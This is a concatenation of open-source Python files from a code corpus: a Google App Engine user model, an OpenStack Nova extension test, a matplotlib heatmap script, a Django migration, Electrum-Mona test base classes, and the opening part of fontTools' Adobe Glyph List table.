digitalocean/netbox
|
netbox/dcim/migrations/0006_add_device_primary_ip4_ip6.py
|
Python
|
apache-2.0
| 914
|
# coding: utf-8
from __future__ import absolute_import
import hashlib
from flask.ext.babel import lazy_gettext as _
from google.appengine.ext import ndb
from api import fields
import model
import util
import config
class User(model.Base):
    """NDB model for an application user account."""
    name = ndb.StringProperty(required=True, verbose_name=_('Name'))
    username = ndb.StringProperty(required=True, verbose_name=_('Username'))
    email = ndb.StringProperty(default='', verbose_name=_('Email'))
    locale = ndb.StringProperty(default='', verbose_name=_('Language'))
    auth_ids = ndb.StringProperty(repeated=True)
    active = ndb.BooleanProperty(default=True, verbose_name=_('Active'))
    admin = ndb.BooleanProperty(default=False, verbose_name=_('Admin'))
    permissions = ndb.StringProperty(repeated=True, verbose_name=_('Permissions'))
    verified = ndb.BooleanProperty(default=False, verbose_name=_('Verified'))
    token = ndb.StringProperty(default='')
    password_hash = ndb.StringProperty(default='')
    def has_permission(self, perm):
        """Return True when the user is an admin or holds ``perm``."""
        return self.admin or perm in self.permissions
    def avatar_url_size(self, size=None):
        """Return the user's Gravatar URL, optionally sized to ``size`` px.

        BUGFIX: guard ``size`` against None before the numeric comparison —
        ``None > 0`` raises TypeError on Python 3 (it was silently False on
        Python 2). Behavior is unchanged for all previously working inputs.
        """
        return '//gravatar.com/avatar/%(hash)s?d=identicon&r=x%(size)s' % {
            'hash': hashlib.md5(
                (self.email or self.username).encode('utf-8')).hexdigest(),
            'size': '&s=%d' % size if size is not None and size > 0 else '',
        }
    # Unsized avatar URL exposed as a read-only attribute.
    avatar_url = property(avatar_url_size)
    @classmethod
    def get_dbs(
        cls, admin=None, active=None, verified=None, permissions=None, **kwargs
    ):
        """Query users; explicit args win over same-named request params."""
        return super(User, cls).get_dbs(
            admin=admin or util.param('admin', bool),
            active=active or util.param('active', bool),
            verified=verified or util.param('verified', bool),
            permissions=permissions or util.param('permissions', list),
            **kwargs
        )
    @classmethod
    def is_username_available(cls, username, self_key=None):
        """True if ``username`` is unused (or used only by ``self_key``)."""
        if self_key is None:
            return cls.get_by('username', username) is None
        # Fetch up to two keys: available iff none, or only self_key, match.
        user_keys, _ = util.get_keys(cls.query(), username=username, limit=2)
        return not user_keys or self_key in user_keys and not user_keys[1:]
    @classmethod
    def is_email_available(cls, email, self_key=None):
        """True if ``email`` is unused among *verified* users (or used only
        by ``self_key``); always True when uniqueness checking is off."""
        if not config.CONFIG_DB.check_unique_email:
            return True
        user_keys, _ = util.get_keys(
            cls.query(), email=email, verified=True, limit=2,
        )
        return not user_keys or self_key in user_keys and not user_keys[1:]
    # API serialization schema for this model (extends the base fields).
    FIELDS = {
        'active': fields.Boolean,
        'admin': fields.Boolean,
        'auth_ids': fields.List(fields.String),
        'avatar_url': fields.String,
        'email': fields.String,
        'locale': fields.String,
        'name': fields.String,
        'permissions': fields.List(fields.String),
        'username': fields.String,
        'verified': fields.Boolean,
    }
    FIELDS.update(model.Base.FIELDS)
|
mdxs/gae-init-babel
|
main/model/user.py
|
Python
|
mit
| 2,779
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack.compute import extensions
from nova import flags
from nova.log import logging
from nova.tests.integrated import integrated_helpers
# Module-level handles to the global flag registry and this module's logger.
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
class ExtensionsTest(integrated_helpers._IntegratedTestBase):
    """Integration test exercising the fox-n-socks sample API extension."""

    def _get_flags(self):
        # Extend the inherited flag set with the test-only extension class.
        flag_overrides = super(ExtensionsTest, self)._get_flags()
        flag_overrides['osapi_compute_extension'] = (
            FLAGS.osapi_compute_extension[:])
        flag_overrides['osapi_compute_extension'].append(
            'nova.tests.api.openstack.compute.extensions.'
            'foxinsocks.Foxinsocks')
        return flag_overrides

    def test_get_foxnsocks(self):
        """Simple check that fox-n-socks works."""
        reply = self.api.api_request('/foxnsocks')
        body = reply.read()
        LOG.debug("foxnsocks: %s" % body)
        self.assertEqual('Try to say this Mr. Knox, sir...', body)
|
sileht/deb-openstack-nova
|
nova/tests/integrated/test_extensions.py
|
Python
|
apache-2.0
| 1,560
|
import sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from matplotlib.ticker import FuncFormatter
# Piecewise-linear RGB ramp: black -> blue -> red -> yellow; each tuple is
# (position, value_below, value_above) per matplotlib's segmentdata format.
cdict = {'red': [(0.0, 0.0, 0.0),
                 (0.33, 0.0, 0.0),
                 (0.66, 1.0, 1.0),
                 (1.0, 1.0, 1.0)],
         'blue': [(0.0, 0.0, 0.0),
                  (0.33, 1.0, 1.0),
                  (0.66, 0.0, 0.0),
                  (1.0, 0.0, 0.0)],
         'green': [(0.0, 0.0, 0.0),
                   (0.33, 0.0, 0.0),
                   (0.66, 0.0, 0.0),
                   (1.0, 1.0, 1.0)]}
# 256-level colormap used for the heatmap below.
my_cmap = matplotlib.colors.LinearSegmentedColormap('my_colormap', cdict, 256)
def scale(x, pos):
    """Axis tick formatter: map a 0-100 tick value to a 0.0-1.0 label.

    ``pos`` is required by matplotlib's FuncFormatter signature but unused.
    """
    return '%1.1f' % (x / 100.0)
def scale2(x, pos):
    """Axis tick formatter for the x axis: 0-100 tick -> 0.0-1.0 label.

    ``pos`` is required by matplotlib's FuncFormatter signature but unused.
    """
    return '%1.1f' % (x / 100.0)
# Usage: plot_map.py <data file> <grid size>. This is Python 2 code
# (print statement below).
size = int(sys.argv[2])
x, y, z = np.loadtxt(sys.argv[1]).T
data = np.zeros((size, size))
# Track the best (maximum) z value and its grid cell while filling the grid.
m = 0
x_m = 0
y_m = 0
for i in range(0, len(z)):
    # NOTE(review): round() yields a float here; this relies on Python 2 /
    # old-NumPy accepting float indices — TODO confirm before porting.
    data[round(x[i] * size), round(y[i] * size)] = z[i]
    if z[i] > m:
        x_m = round(x[i] * size)
        y_m = round(y[i] * size)
        m = z[i]
# Mask empty cells so they render as background rather than zero.
data = np.ma.masked_where(data == 0, data)
print "best:"+str(max(z))
def load_points(fname):
    """Load (z, y, x) rows from ``fname``, scale x/y by the module-level
    ``size``, and split them into positive (z == 1.0) and negative groups.

    Returns four lists: positive xs, positive ys, negative xs, negative ys.
    """
    p_z, p_y, p_x = np.loadtxt(fname).T
    p_x *= size
    p_y *= size
    pos_x, pos_y = [], []
    neg_x, neg_y = [], []
    for z_val, x_val, y_val in zip(p_z, p_x, p_y):
        if z_val == 1.0:
            pos_x.append(x_val)
            pos_y.append(y_val)
        else:
            neg_x.append(x_val)
            neg_y.append(y_val)
    return pos_x, pos_y, neg_x, neg_y
# Render the masked grid as a heatmap and save it as a PDF.
fig = plt.figure()
im = plt.imshow(data.T, origin='lower', cmap=my_cmap)
im.set_interpolation('nearest')
fig.subplots_adjust(top=0.98)
cb = plt.colorbar()
for t in cb.ax.get_xticklabels():
    t.set_fontsize(130)
ax = fig.add_subplot(111)
# Relabel both axes from grid cells back to the original 0.0-1.0 range.
ax.yaxis.set_major_formatter(FuncFormatter(scale))
ax.xaxis.set_major_formatter(FuncFormatter(scale2))
plt.savefig('heatmap.pdf')
|
Evolving-AI-Lab/innovation-engine
|
sferes/modules/map_elite/plot_map.py
|
Python
|
mit
| 1,994
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-12 08:58
from __future__ import unicode_literals
from django.conf import settings
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create multi-table-inheritance models Author (extends users.User)
    and Editor (extends weblog.Author), each via a parent-link OneToOne."""
    dependencies = [
        ('users', '0001_initial'),
        ('weblog', '0005_auto_20160112_0956'),
    ]
    operations = [
        migrations.CreateModel(
            name='Author',
            fields=[
                ('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
                'verbose_name_plural': 'users',
                'verbose_name': 'user',
            },
            bases=('users.user',),
            managers=[
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
        migrations.CreateModel(
            name='Editor',
            fields=[
                ('author_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='weblog.Author')),
            ],
            options={
                'abstract': False,
                'verbose_name_plural': 'users',
                'verbose_name': 'user',
            },
            bases=('weblog.author',),
            managers=[
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
    ]
|
drxos/kuiqblog
|
weblog/migrations/0006_author_editor.py
|
Python
|
bsd-3-clause
| 1,641
|
import unittest
import threading
import tempfile
import shutil
import electrum_mona
import electrum_mona.logging
from electrum_mona import constants
# Set this locally to make the test suite run faster.
# If set, unit tests that would normally test functions with multiple implementations,
# will only be run once, using the fastest implementation.
# e.g. libsecp256k1 vs python-ecdsa. pycryptodomex vs pyaes.
# See the explanatory comment above: developers may flip this locally.
FAST_TESTS = False
# Route test logging to stderr for the whole test package.
electrum_mona.logging._configure_stderr_logging()
# some unit tests are modifying globals...
class SequentialTestCase(unittest.TestCase):
    """TestCase that serializes test execution via a class-wide lock,
    protecting tests that mutate shared module globals."""

    test_lock = threading.Lock()

    def setUp(self):
        super().setUp()
        # Hold the shared lock for the whole duration of each test.
        self.test_lock.acquire()

    def tearDown(self):
        super().tearDown()
        self.test_lock.release()
class ElectrumTestCase(SequentialTestCase):
    """Base class for our unit tests: adds a per-test scratch directory."""

    def setUp(self):
        super().setUp()
        # Fresh temporary directory for each test; removed in tearDown.
        self.electrum_path = tempfile.mkdtemp()

    def tearDown(self):
        super().tearDown()
        shutil.rmtree(self.electrum_path)
class TestCaseForTestnet(ElectrumTestCase):
    """ElectrumTestCase variant that runs with testnet chain parameters
    active for the whole class, restoring mainnet afterwards."""

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        constants.set_testnet()

    @classmethod
    def tearDownClass(cls):
        super().tearDownClass()
        constants.set_mainnet()
|
wakiyamap/electrum-mona
|
electrum_mona/tests/__init__.py
|
Python
|
mit
| 1,307
|
# -*- coding: utf-8 -*-
# The tables below are taken from
# https://github.com/adobe-type-tools/agl-aglfn/raw/4036a9ca80a62f64f9de4f7321a9a045ad0ecfd6/glyphlist.txt
# and
# https://github.com/adobe-type-tools/agl-aglfn/raw/4036a9ca80a62f64f9de4f7321a9a045ad0ecfd6/aglfn.txt
"""
Interface to the Adobe Glyph List
This module exists to convert glyph names from the Adobe Glyph List
to their Unicode equivalents. Example usage:
>>> from fontTools.agl import toUnicode
>>> toUnicode("nahiragana")
'な'
It also contains two dictionaries, ``UV2AGL`` and ``AGL2UV``, which map from
Unicode codepoints to AGL names and vice versa:
>>> import fontTools
>>> fontTools.agl.UV2AGL[ord("?")]
'question'
>>> fontTools.agl.AGL2UV["wcircumflex"]
373
This is used by fontTools when it has to construct glyph names for a font which
doesn't include any (e.g. format 3.0 post tables).
"""
from fontTools.misc.py23 import tostr
import re
_aglText = """\
# -----------------------------------------------------------
# Copyright 2002-2019 Adobe (http://www.adobe.com/).
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the
# following conditions are met:
#
# Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# Neither the name of Adobe nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# -----------------------------------------------------------
# Name: Adobe Glyph List
# Table version: 2.0
# Date: September 20, 2002
# URL: https://github.com/adobe-type-tools/agl-aglfn
#
# Format: two semicolon-delimited fields:
# (1) glyph name--upper/lowercase letters and digits
# (2) Unicode scalar value--four uppercase hexadecimal digits
#
A;0041
AE;00C6
AEacute;01FC
AEmacron;01E2
AEsmall;F7E6
Aacute;00C1
Aacutesmall;F7E1
Abreve;0102
Abreveacute;1EAE
Abrevecyrillic;04D0
Abrevedotbelow;1EB6
Abrevegrave;1EB0
Abrevehookabove;1EB2
Abrevetilde;1EB4
Acaron;01CD
Acircle;24B6
Acircumflex;00C2
Acircumflexacute;1EA4
Acircumflexdotbelow;1EAC
Acircumflexgrave;1EA6
Acircumflexhookabove;1EA8
Acircumflexsmall;F7E2
Acircumflextilde;1EAA
Acute;F6C9
Acutesmall;F7B4
Acyrillic;0410
Adblgrave;0200
Adieresis;00C4
Adieresiscyrillic;04D2
Adieresismacron;01DE
Adieresissmall;F7E4
Adotbelow;1EA0
Adotmacron;01E0
Agrave;00C0
Agravesmall;F7E0
Ahookabove;1EA2
Aiecyrillic;04D4
Ainvertedbreve;0202
Alpha;0391
Alphatonos;0386
Amacron;0100
Amonospace;FF21
Aogonek;0104
Aring;00C5
Aringacute;01FA
Aringbelow;1E00
Aringsmall;F7E5
Asmall;F761
Atilde;00C3
Atildesmall;F7E3
Aybarmenian;0531
B;0042
Bcircle;24B7
Bdotaccent;1E02
Bdotbelow;1E04
Becyrillic;0411
Benarmenian;0532
Beta;0392
Bhook;0181
Blinebelow;1E06
Bmonospace;FF22
Brevesmall;F6F4
Bsmall;F762
Btopbar;0182
C;0043
Caarmenian;053E
Cacute;0106
Caron;F6CA
Caronsmall;F6F5
Ccaron;010C
Ccedilla;00C7
Ccedillaacute;1E08
Ccedillasmall;F7E7
Ccircle;24B8
Ccircumflex;0108
Cdot;010A
Cdotaccent;010A
Cedillasmall;F7B8
Chaarmenian;0549
Cheabkhasiancyrillic;04BC
Checyrillic;0427
Chedescenderabkhasiancyrillic;04BE
Chedescendercyrillic;04B6
Chedieresiscyrillic;04F4
Cheharmenian;0543
Chekhakassiancyrillic;04CB
Cheverticalstrokecyrillic;04B8
Chi;03A7
Chook;0187
Circumflexsmall;F6F6
Cmonospace;FF23
Coarmenian;0551
Csmall;F763
D;0044
DZ;01F1
DZcaron;01C4
Daarmenian;0534
Dafrican;0189
Dcaron;010E
Dcedilla;1E10
Dcircle;24B9
Dcircumflexbelow;1E12
Dcroat;0110
Ddotaccent;1E0A
Ddotbelow;1E0C
Decyrillic;0414
Deicoptic;03EE
Delta;2206
Deltagreek;0394
Dhook;018A
Dieresis;F6CB
DieresisAcute;F6CC
DieresisGrave;F6CD
Dieresissmall;F7A8
Digammagreek;03DC
Djecyrillic;0402
Dlinebelow;1E0E
Dmonospace;FF24
Dotaccentsmall;F6F7
Dslash;0110
Dsmall;F764
Dtopbar;018B
Dz;01F2
Dzcaron;01C5
Dzeabkhasiancyrillic;04E0
Dzecyrillic;0405
Dzhecyrillic;040F
E;0045
Eacute;00C9
Eacutesmall;F7E9
Ebreve;0114
Ecaron;011A
Ecedillabreve;1E1C
Echarmenian;0535
Ecircle;24BA
Ecircumflex;00CA
Ecircumflexacute;1EBE
Ecircumflexbelow;1E18
Ecircumflexdotbelow;1EC6
Ecircumflexgrave;1EC0
Ecircumflexhookabove;1EC2
Ecircumflexsmall;F7EA
Ecircumflextilde;1EC4
Ecyrillic;0404
Edblgrave;0204
Edieresis;00CB
Edieresissmall;F7EB
Edot;0116
Edotaccent;0116
Edotbelow;1EB8
Efcyrillic;0424
Egrave;00C8
Egravesmall;F7E8
Eharmenian;0537
Ehookabove;1EBA
Eightroman;2167
Einvertedbreve;0206
Eiotifiedcyrillic;0464
Elcyrillic;041B
Elevenroman;216A
Emacron;0112
Emacronacute;1E16
Emacrongrave;1E14
Emcyrillic;041C
Emonospace;FF25
Encyrillic;041D
Endescendercyrillic;04A2
Eng;014A
Enghecyrillic;04A4
Enhookcyrillic;04C7
Eogonek;0118
Eopen;0190
Epsilon;0395
Epsilontonos;0388
Ercyrillic;0420
Ereversed;018E
Ereversedcyrillic;042D
Escyrillic;0421
Esdescendercyrillic;04AA
Esh;01A9
Esmall;F765
Eta;0397
Etarmenian;0538
Etatonos;0389
Eth;00D0
Ethsmall;F7F0
Etilde;1EBC
Etildebelow;1E1A
Euro;20AC
Ezh;01B7
Ezhcaron;01EE
Ezhreversed;01B8
F;0046
Fcircle;24BB
Fdotaccent;1E1E
Feharmenian;0556
Feicoptic;03E4
Fhook;0191
Fitacyrillic;0472
Fiveroman;2164
Fmonospace;FF26
Fourroman;2163
Fsmall;F766
G;0047
GBsquare;3387
Gacute;01F4
Gamma;0393
Gammaafrican;0194
Gangiacoptic;03EA
Gbreve;011E
Gcaron;01E6
Gcedilla;0122
Gcircle;24BC
Gcircumflex;011C
Gcommaaccent;0122
Gdot;0120
Gdotaccent;0120
Gecyrillic;0413
Ghadarmenian;0542
Ghemiddlehookcyrillic;0494
Ghestrokecyrillic;0492
Gheupturncyrillic;0490
Ghook;0193
Gimarmenian;0533
Gjecyrillic;0403
Gmacron;1E20
Gmonospace;FF27
Grave;F6CE
Gravesmall;F760
Gsmall;F767
Gsmallhook;029B
Gstroke;01E4
H;0048
H18533;25CF
H18543;25AA
H18551;25AB
H22073;25A1
HPsquare;33CB
Haabkhasiancyrillic;04A8
Hadescendercyrillic;04B2
Hardsigncyrillic;042A
Hbar;0126
Hbrevebelow;1E2A
Hcedilla;1E28
Hcircle;24BD
Hcircumflex;0124
Hdieresis;1E26
Hdotaccent;1E22
Hdotbelow;1E24
Hmonospace;FF28
Hoarmenian;0540
Horicoptic;03E8
Hsmall;F768
Hungarumlaut;F6CF
Hungarumlautsmall;F6F8
Hzsquare;3390
I;0049
IAcyrillic;042F
IJ;0132
IUcyrillic;042E
Iacute;00CD
Iacutesmall;F7ED
Ibreve;012C
Icaron;01CF
Icircle;24BE
Icircumflex;00CE
Icircumflexsmall;F7EE
Icyrillic;0406
Idblgrave;0208
Idieresis;00CF
Idieresisacute;1E2E
Idieresiscyrillic;04E4
Idieresissmall;F7EF
Idot;0130
Idotaccent;0130
Idotbelow;1ECA
Iebrevecyrillic;04D6
Iecyrillic;0415
Ifraktur;2111
Igrave;00CC
Igravesmall;F7EC
Ihookabove;1EC8
Iicyrillic;0418
Iinvertedbreve;020A
Iishortcyrillic;0419
Imacron;012A
Imacroncyrillic;04E2
Imonospace;FF29
Iniarmenian;053B
Iocyrillic;0401
Iogonek;012E
Iota;0399
Iotaafrican;0196
Iotadieresis;03AA
Iotatonos;038A
Ismall;F769
Istroke;0197
Itilde;0128
Itildebelow;1E2C
Izhitsacyrillic;0474
Izhitsadblgravecyrillic;0476
J;004A
Jaarmenian;0541
Jcircle;24BF
Jcircumflex;0134
Jecyrillic;0408
Jheharmenian;054B
Jmonospace;FF2A
Jsmall;F76A
K;004B
KBsquare;3385
KKsquare;33CD
Kabashkircyrillic;04A0
Kacute;1E30
Kacyrillic;041A
Kadescendercyrillic;049A
Kahookcyrillic;04C3
Kappa;039A
Kastrokecyrillic;049E
Kaverticalstrokecyrillic;049C
Kcaron;01E8
Kcedilla;0136
Kcircle;24C0
Kcommaaccent;0136
Kdotbelow;1E32
Keharmenian;0554
Kenarmenian;053F
Khacyrillic;0425
Kheicoptic;03E6
Khook;0198
Kjecyrillic;040C
Klinebelow;1E34
Kmonospace;FF2B
Koppacyrillic;0480
Koppagreek;03DE
Ksicyrillic;046E
Ksmall;F76B
L;004C
LJ;01C7
LL;F6BF
Lacute;0139
Lambda;039B
Lcaron;013D
Lcedilla;013B
Lcircle;24C1
Lcircumflexbelow;1E3C
Lcommaaccent;013B
Ldot;013F
Ldotaccent;013F
Ldotbelow;1E36
Ldotbelowmacron;1E38
Liwnarmenian;053C
Lj;01C8
Ljecyrillic;0409
Llinebelow;1E3A
Lmonospace;FF2C
Lslash;0141
Lslashsmall;F6F9
Lsmall;F76C
M;004D
MBsquare;3386
Macron;F6D0
Macronsmall;F7AF
Macute;1E3E
Mcircle;24C2
Mdotaccent;1E40
Mdotbelow;1E42
Menarmenian;0544
Mmonospace;FF2D
Msmall;F76D
Mturned;019C
Mu;039C
N;004E
NJ;01CA
Nacute;0143
Ncaron;0147
Ncedilla;0145
Ncircle;24C3
Ncircumflexbelow;1E4A
Ncommaaccent;0145
Ndotaccent;1E44
Ndotbelow;1E46
Nhookleft;019D
Nineroman;2168
Nj;01CB
Njecyrillic;040A
Nlinebelow;1E48
Nmonospace;FF2E
Nowarmenian;0546
Nsmall;F76E
Ntilde;00D1
Ntildesmall;F7F1
Nu;039D
O;004F
OE;0152
OEsmall;F6FA
Oacute;00D3
Oacutesmall;F7F3
Obarredcyrillic;04E8
Obarreddieresiscyrillic;04EA
Obreve;014E
Ocaron;01D1
Ocenteredtilde;019F
Ocircle;24C4
Ocircumflex;00D4
Ocircumflexacute;1ED0
Ocircumflexdotbelow;1ED8
Ocircumflexgrave;1ED2
Ocircumflexhookabove;1ED4
Ocircumflexsmall;F7F4
Ocircumflextilde;1ED6
Ocyrillic;041E
Odblacute;0150
Odblgrave;020C
Odieresis;00D6
Odieresiscyrillic;04E6
Odieresissmall;F7F6
Odotbelow;1ECC
Ogoneksmall;F6FB
Ograve;00D2
Ogravesmall;F7F2
Oharmenian;0555
Ohm;2126
Ohookabove;1ECE
Ohorn;01A0
Ohornacute;1EDA
Ohorndotbelow;1EE2
Ohorngrave;1EDC
Ohornhookabove;1EDE
Ohorntilde;1EE0
Ohungarumlaut;0150
Oi;01A2
Oinvertedbreve;020E
Omacron;014C
Omacronacute;1E52
Omacrongrave;1E50
Omega;2126
Omegacyrillic;0460
Omegagreek;03A9
Omegaroundcyrillic;047A
Omegatitlocyrillic;047C
Omegatonos;038F
Omicron;039F
Omicrontonos;038C
Omonospace;FF2F
Oneroman;2160
Oogonek;01EA
Oogonekmacron;01EC
Oopen;0186
Oslash;00D8
Oslashacute;01FE
Oslashsmall;F7F8
Osmall;F76F
Ostrokeacute;01FE
Otcyrillic;047E
Otilde;00D5
Otildeacute;1E4C
Otildedieresis;1E4E
Otildesmall;F7F5
P;0050
Pacute;1E54
Pcircle;24C5
Pdotaccent;1E56
Pecyrillic;041F
Peharmenian;054A
Pemiddlehookcyrillic;04A6
Phi;03A6
Phook;01A4
Pi;03A0
Piwrarmenian;0553
Pmonospace;FF30
Psi;03A8
Psicyrillic;0470
Psmall;F770
Q;0051
Qcircle;24C6
Qmonospace;FF31
Qsmall;F771
R;0052
Raarmenian;054C
Racute;0154
Rcaron;0158
Rcedilla;0156
Rcircle;24C7
Rcommaaccent;0156
Rdblgrave;0210
Rdotaccent;1E58
Rdotbelow;1E5A
Rdotbelowmacron;1E5C
Reharmenian;0550
Rfraktur;211C
Rho;03A1
Ringsmall;F6FC
Rinvertedbreve;0212
Rlinebelow;1E5E
Rmonospace;FF32
Rsmall;F772
Rsmallinverted;0281
Rsmallinvertedsuperior;02B6
S;0053
SF010000;250C
SF020000;2514
SF030000;2510
SF040000;2518
SF050000;253C
SF060000;252C
SF070000;2534
SF080000;251C
SF090000;2524
SF100000;2500
SF110000;2502
SF190000;2561
SF200000;2562
SF210000;2556
SF220000;2555
SF230000;2563
SF240000;2551
SF250000;2557
SF260000;255D
SF270000;255C
SF280000;255B
SF360000;255E
SF370000;255F
SF380000;255A
SF390000;2554
SF400000;2569
SF410000;2566
SF420000;2560
SF430000;2550
SF440000;256C
SF450000;2567
SF460000;2568
SF470000;2564
SF480000;2565
SF490000;2559
SF500000;2558
SF510000;2552
SF520000;2553
SF530000;256B
SF540000;256A
Sacute;015A
Sacutedotaccent;1E64
Sampigreek;03E0
Scaron;0160
Scarondotaccent;1E66
Scaronsmall;F6FD
Scedilla;015E
Schwa;018F
Schwacyrillic;04D8
Schwadieresiscyrillic;04DA
Scircle;24C8
Scircumflex;015C
Scommaaccent;0218
Sdotaccent;1E60
Sdotbelow;1E62
Sdotbelowdotaccent;1E68
Seharmenian;054D
Sevenroman;2166
Shaarmenian;0547
Shacyrillic;0428
Shchacyrillic;0429
Sheicoptic;03E2
Shhacyrillic;04BA
Shimacoptic;03EC
Sigma;03A3
Sixroman;2165
Smonospace;FF33
Softsigncyrillic;042C
Ssmall;F773
Stigmagreek;03DA
T;0054
Tau;03A4
Tbar;0166
Tcaron;0164
Tcedilla;0162
Tcircle;24C9
Tcircumflexbelow;1E70
Tcommaaccent;0162
Tdotaccent;1E6A
Tdotbelow;1E6C
Tecyrillic;0422
Tedescendercyrillic;04AC
Tenroman;2169
Tetsecyrillic;04B4
Theta;0398
Thook;01AC
Thorn;00DE
Thornsmall;F7FE
Threeroman;2162
Tildesmall;F6FE
Tiwnarmenian;054F
Tlinebelow;1E6E
Tmonospace;FF34
Toarmenian;0539
Tonefive;01BC
Tonesix;0184
Tonetwo;01A7
Tretroflexhook;01AE
Tsecyrillic;0426
Tshecyrillic;040B
Tsmall;F774
Twelveroman;216B
Tworoman;2161
U;0055
Uacute;00DA
Uacutesmall;F7FA
Ubreve;016C
Ucaron;01D3
Ucircle;24CA
Ucircumflex;00DB
Ucircumflexbelow;1E76
Ucircumflexsmall;F7FB
Ucyrillic;0423
Udblacute;0170
Udblgrave;0214
Udieresis;00DC
Udieresisacute;01D7
Udieresisbelow;1E72
Udieresiscaron;01D9
Udieresiscyrillic;04F0
Udieresisgrave;01DB
Udieresismacron;01D5
Udieresissmall;F7FC
Udotbelow;1EE4
Ugrave;00D9
Ugravesmall;F7F9
Uhookabove;1EE6
Uhorn;01AF
Uhornacute;1EE8
Uhorndotbelow;1EF0
Uhorngrave;1EEA
Uhornhookabove;1EEC
Uhorntilde;1EEE
Uhungarumlaut;0170
Uhungarumlautcyrillic;04F2
Uinvertedbreve;0216
Ukcyrillic;0478
Umacron;016A
Umacroncyrillic;04EE
Umacrondieresis;1E7A
Umonospace;FF35
Uogonek;0172
Upsilon;03A5
Upsilon1;03D2
Upsilonacutehooksymbolgreek;03D3
Upsilonafrican;01B1
Upsilondieresis;03AB
Upsilondieresishooksymbolgreek;03D4
Upsilonhooksymbol;03D2
Upsilontonos;038E
Uring;016E
Ushortcyrillic;040E
Usmall;F775
Ustraightcyrillic;04AE
Ustraightstrokecyrillic;04B0
Utilde;0168
Utildeacute;1E78
Utildebelow;1E74
V;0056
Vcircle;24CB
Vdotbelow;1E7E
Vecyrillic;0412
Vewarmenian;054E
Vhook;01B2
Vmonospace;FF36
Voarmenian;0548
Vsmall;F776
Vtilde;1E7C
W;0057
Wacute;1E82
Wcircle;24CC
Wcircumflex;0174
Wdieresis;1E84
Wdotaccent;1E86
Wdotbelow;1E88
Wgrave;1E80
Wmonospace;FF37
Wsmall;F777
X;0058
Xcircle;24CD
Xdieresis;1E8C
Xdotaccent;1E8A
Xeharmenian;053D
Xi;039E
Xmonospace;FF38
Xsmall;F778
Y;0059
Yacute;00DD
Yacutesmall;F7FD
Yatcyrillic;0462
Ycircle;24CE
Ycircumflex;0176
Ydieresis;0178
Ydieresissmall;F7FF
Ydotaccent;1E8E
Ydotbelow;1EF4
Yericyrillic;042B
Yerudieresiscyrillic;04F8
Ygrave;1EF2
Yhook;01B3
Yhookabove;1EF6
Yiarmenian;0545
Yicyrillic;0407
Yiwnarmenian;0552
Ymonospace;FF39
Ysmall;F779
Ytilde;1EF8
Yusbigcyrillic;046A
Yusbigiotifiedcyrillic;046C
Yuslittlecyrillic;0466
Yuslittleiotifiedcyrillic;0468
Z;005A
Zaarmenian;0536
Zacute;0179
Zcaron;017D
Zcaronsmall;F6FF
Zcircle;24CF
Zcircumflex;1E90
Zdot;017B
Zdotaccent;017B
Zdotbelow;1E92
Zecyrillic;0417
Zedescendercyrillic;0498
Zedieresiscyrillic;04DE
Zeta;0396
Zhearmenian;053A
Zhebrevecyrillic;04C1
Zhecyrillic;0416
Zhedescendercyrillic;0496
Zhedieresiscyrillic;04DC
Zlinebelow;1E94
Zmonospace;FF3A
Zsmall;F77A
Zstroke;01B5
a;0061
aabengali;0986
aacute;00E1
aadeva;0906
aagujarati;0A86
aagurmukhi;0A06
aamatragurmukhi;0A3E
aarusquare;3303
aavowelsignbengali;09BE
aavowelsigndeva;093E
aavowelsigngujarati;0ABE
abbreviationmarkarmenian;055F
abbreviationsigndeva;0970
abengali;0985
abopomofo;311A
abreve;0103
abreveacute;1EAF
abrevecyrillic;04D1
abrevedotbelow;1EB7
abrevegrave;1EB1
abrevehookabove;1EB3
abrevetilde;1EB5
acaron;01CE
acircle;24D0
acircumflex;00E2
acircumflexacute;1EA5
acircumflexdotbelow;1EAD
acircumflexgrave;1EA7
acircumflexhookabove;1EA9
acircumflextilde;1EAB
acute;00B4
